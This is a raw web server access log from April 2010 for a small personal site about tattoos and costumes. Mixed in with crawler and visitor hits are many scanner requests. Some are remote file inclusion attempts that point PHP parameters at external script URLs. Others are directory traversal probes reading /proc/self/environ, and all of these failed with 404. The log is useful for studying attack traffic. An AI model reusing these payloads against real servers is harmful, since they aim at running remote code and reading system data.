195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/access_log.1264118400/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:05 -0500] "GET /logs/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:06 -0500] "GET /logs/access_log.1264118400/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:06 -0500] "GET /logs/access_log.1251504000/index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:53:06 -0500] "GET /index.php?menu=deti&page=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:20:53:41 -0500] "GET /logs/access_log.1242345600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
195.9.14.148 - - [30/Apr/2010:20:57:14 -0500] "GET /logs/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:14 -0500] "GET /module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:18 -0500] "GET /logs/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:18 -0500] "GET /module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:18 -0500] "GET /logs/access_log.1263081600/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:18 -0500] "GET /logs/access_log.1266537600/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:22 -0500] "GET /logs/access_log.1263081600/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.9.14.148 - - [30/Apr/2010:20:57:22 -0500] "GET /logs/access_log.1266537600/module_db.php?pivot_path=http://gayrealestate.com/listing_manager/images/uploads/agent_photo/medium/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.235.124.54 - - [30/Apr/2010:21:03:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.54 - - [30/Apr/2010:21:03:41 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
98.164.159.133 - - [30/Apr/2010:21:04:24 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&rls=com.microsoft%3Aen-us%3AIE-Address&rlz=1I7ACAW_en___US346&q=what+is+vintage+tatoo+flash&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"
98.164.159.133 - - [30/Apr/2010:21:04:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"
98.164.159.133 - - [30/Apr/2010:21:04:26 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; eSobiSubscriber 2.0.4.16; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"
61.67.201.187 - - [30/Apr/2010:21:06:33 -0500] "GET //secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.67.201.187 - - [30/Apr/2010:21:06:33 -0500] "GET /logs//secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.67.201.187 - - [30/Apr/2010:21:06:34 -0500] "GET /logs/access_log.1265414400//secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.67.201.187 - - [30/Apr/2010:21:06:35 -0500] "GET //secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
61.67.201.187 - - [30/Apr/2010:21:06:35 -0500] "GET /logs//secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.67.201.187 - - [30/Apr/2010:21:06:35 -0500] "GET /logs/access_log.1265414400//secure.php?basePath=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:21:07:08 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [30/Apr/2010:21:13:56 -0500] "GET /costume/shipping.htm HTTP/1.1" 404 304 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [30/Apr/2010:21:15:05 -0500] "GET /logs//secure.php?basePath=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
81.208.34.38 - - [30/Apr/2010:21:15:05 -0500] "GET //secure.php?basePath=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
81.208.34.38 - - [30/Apr/2010:21:15:05 -0500] "GET /logs/access_log.1263427200//secure.php?basePath=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
81.208.34.38 - - [30/Apr/2010:21:15:07 -0500] "GET /logs/access_log.1265414400//secure.php?basePath=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:17:22 -0500] "GET /logs/access_log.1265068800/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:17:22 -0500] "GET /write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:17:22 -0500] "GET /logs/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:17:53 -0500] "GET /logs/access_log.1262476800/write.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:21:19:57 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [30/Apr/2010:21:27:40 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.47.133 - - [30/Apr/2010:21:35:53 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
83.223.101.114 - - [30/Apr/2010:21:36:04 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
83.223.101.114 - - [30/Apr/2010:21:36:06 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
83.223.101.114 - - [30/Apr/2010:21:36:07 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
83.223.101.114 - - [30/Apr/2010:21:36:07 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
66.223.110.205 - - [30/Apr/2010:21:36:14 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:36:15 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
85.114.135.218 - - [30/Apr/2010:21:36:21 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
120.50.40.41 - - [30/Apr/2010:21:37:31 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [30/Apr/2010:21:38:35 -0500] "GET /logs/access_log.1209340800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.223.110.205 - - [30/Apr/2010:21:39:48 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:39:48 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:39:48 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:40:33 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:40:33 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.223.110.205 - - [30/Apr/2010:21:40:33 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
87.250.255.243 - - [30/Apr/2010:21:41:26 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.223.101.114 - - [30/Apr/2010:21:41:36 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
83.223.101.114 - - [30/Apr/2010:21:41:36 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
83.223.101.114 - - [30/Apr/2010:21:41:37 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.114.135.218 - - [30/Apr/2010:21:41:50 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
174.121.47.133 - - [30/Apr/2010:21:41:50 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
85.114.135.218 - - [30/Apr/2010:21:41:50 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
174.121.47.133 - - [30/Apr/2010:21:41:50 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.47.133 - - [30/Apr/2010:21:41:50 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
85.114.135.218 - - [30/Apr/2010:21:41:50 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
78.110.50.139 - - [30/Apr/2010:21:42:00 -0500] "GET /logs/access_log.1270598400//index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:21:42:00 -0500] "GET /logs//index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:21:42:00 -0500] "GET //index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:21:42:07 -0500] "GET //index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:21:42:07 -0500] "GET /logs/access_log.1270598400//index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.139 - - [30/Apr/2010:21:42:07 -0500] "GET /logs//index.php?sayfa=http://www.vsl-gates.ru//assets/images/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.114.135.218 - - [30/Apr/2010:21:42:18 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
85.114.135.218 - - [30/Apr/2010:21:42:18 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
85.114.135.218 - - [30/Apr/2010:21:42:18 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
174.121.47.133 - - [30/Apr/2010:21:42:27 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.47.133 - - [30/Apr/2010:21:42:27 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.47.133 - - [30/Apr/2010:21:42:27 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
218.38.34.19 - - [30/Apr/2010:21:43:28 -0500] "GET /logs///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:43:28 -0500] "GET /logs/access_log.1264723200///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.38.34.19 - - [30/Apr/2010:21:43:28 -0500] "GET ///setup.php?dir=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
120.50.40.41 - - [30/Apr/2010:21:43:43 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.41 - - [30/Apr/2010:21:43:43 -0500] "GET //index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.41 - - [30/Apr/2010:21:43:44 -0500] "GET /logs//index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.195.112.180 - - [30/Apr/2010:21:45:39 -0500] "GET /logs/access_log.1217980800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.40.30.37 - - [30/Apr/2010:21:50:33 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:50:33 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:50:33 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.1.44.193 - - [30/Apr/2010:21:52:03 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
87.1.44.193 - - [30/Apr/2010:21:52:11 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
87.1.44.193 - - [30/Apr/2010:21:52:11 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://77.92.94.85/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.813"
84.40.30.37 - - [30/Apr/2010:21:52:18 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:52:18 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:52:18 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:52:19 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:52:19 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
84.40.30.37 - - [30/Apr/2010:21:52:19 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.250.255.243 - - [30/Apr/2010:21:53:41 -0500] "GET /logs/access_log.1231632000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.102.151.66 - - [30/Apr/2010:21:56:55 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://www.ringsworld.com/history/page-2.html""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:02 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:03 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:13 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:14 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:27 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:29 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:31 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:31 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:31 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:31 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:35 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:57:42 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:58:00 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:58:01 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:58:06 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.102.151.66 - - [30/Apr/2010:21:58:16 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
